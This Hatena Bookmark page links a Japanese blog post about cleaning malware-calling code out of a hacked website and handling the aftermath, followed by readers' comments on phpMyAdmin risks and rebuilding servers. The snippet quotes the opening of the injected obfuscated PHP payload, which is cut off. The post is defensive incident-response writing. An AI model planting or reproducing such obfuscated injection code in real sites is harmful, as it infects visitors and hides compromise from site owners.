(閉じる)

タグ :

コンピュータ・IT 472 users このエントリーをはてなブックマークに追加

脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて | ウェブル

ウェブルの関連サービス改竄された件で報告しました。今回はそれとは別で改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL... > このページを見る

最終更新時間: 2012年01月23日11時02分
▼ブログで紹介する

みんなのブックマーク 人気(6) 新着

  • phpmyadminのプラグインに脆弱性があったことが原因なら、この対策例は無意味だと思う。 - 2012/01/23
  • こういうのを読むと、大手や公的なサイトが高価なCMSを選ぶ理由に改めて納得してしまう。 2012/01/23
  • phpMyAdmin 狙いのあくせすなんて日常茶飯事だし別のも踏んでる可能性あるから断片を grep するよりはいったん全部消してまっさらな状況から再構築のがいいと思うのです・・・ (・x【みかん 2012/01/24
  • 結構ずさんな管理多いからな。まさか自分がねぇと思っているからダメなんですよ。 2012/01/25
  • つか、検索bot避けされてるのは(あたりまえだけど)発覚を遅らせるためなわけで、Webマスターツールでは防ぎきれない。実際問題、改ざん発覚即切り離し、staticで逃げるしかないよなぁ…てかphpMy本番で入れるの… 2012/01/23
  • 無知であることや、自分たちは大丈夫だろうという錯覚を持つことは、どちらも致命的なまでに危険。難攻不落のシステムとは、石橋をミサイル攻撃してから渡るほどの慎重さを持って作られる。 2012/01/23
  • ウェブ 2012/04/08
  • 障害対応の実際 2012/01/27
  • レンタルサーバ、スキルも要らないし安い点は良いんだけど、FTP接続しか対応してなかったりphpMyAdminでDB管理させたりとなにかとアレなことが多いので、素直にスキル身に付けてさくらVPSとか運用したほうがよい。 2012/01/25
  • 結構ずさんな管理多いからな。まさか自分がねぇと思っているからダメなんですよ。 2012/01/25
  • phpMyAdmin 狙いのあくせすなんて日常茶飯事だし別のも踏んでる可能性あるから断片を grep するよりはいったん全部消してまっさらな状況から再構築のがいいと思うのです・・・ (・x【みかん 2012/01/24
  • 調べ方は別に良いんだけど、こういう事は原因推測と再発防止策もセットで検討しないとあまり意味ないような。 2012/01/24
  •  あとで読む 2012/01/24
  • ウィルス対応 2012/01/24
  • ぶくま…使うことはないようにしたいけども|脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて | ウェブル 2012/01/24
  • 脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて 2012/01/24
  • 冷静に、そして勇気を持って対処した運営者に敬意を表して 2012/01/24
  • こわい 2012/01/24

このブックマーク一覧を非公開にするには?

はてなブックマークはオンラインでブックマークを管理・共有できる無料サービス。自宅、職場、外出先、どこからでも同じブックマークにアクセスできます。ユーザーはみんなでブックマークを共有して効率良く情報収集しています。あなたもはてなブックマークを始めてみませんか?

このエントリーを含む日記(2)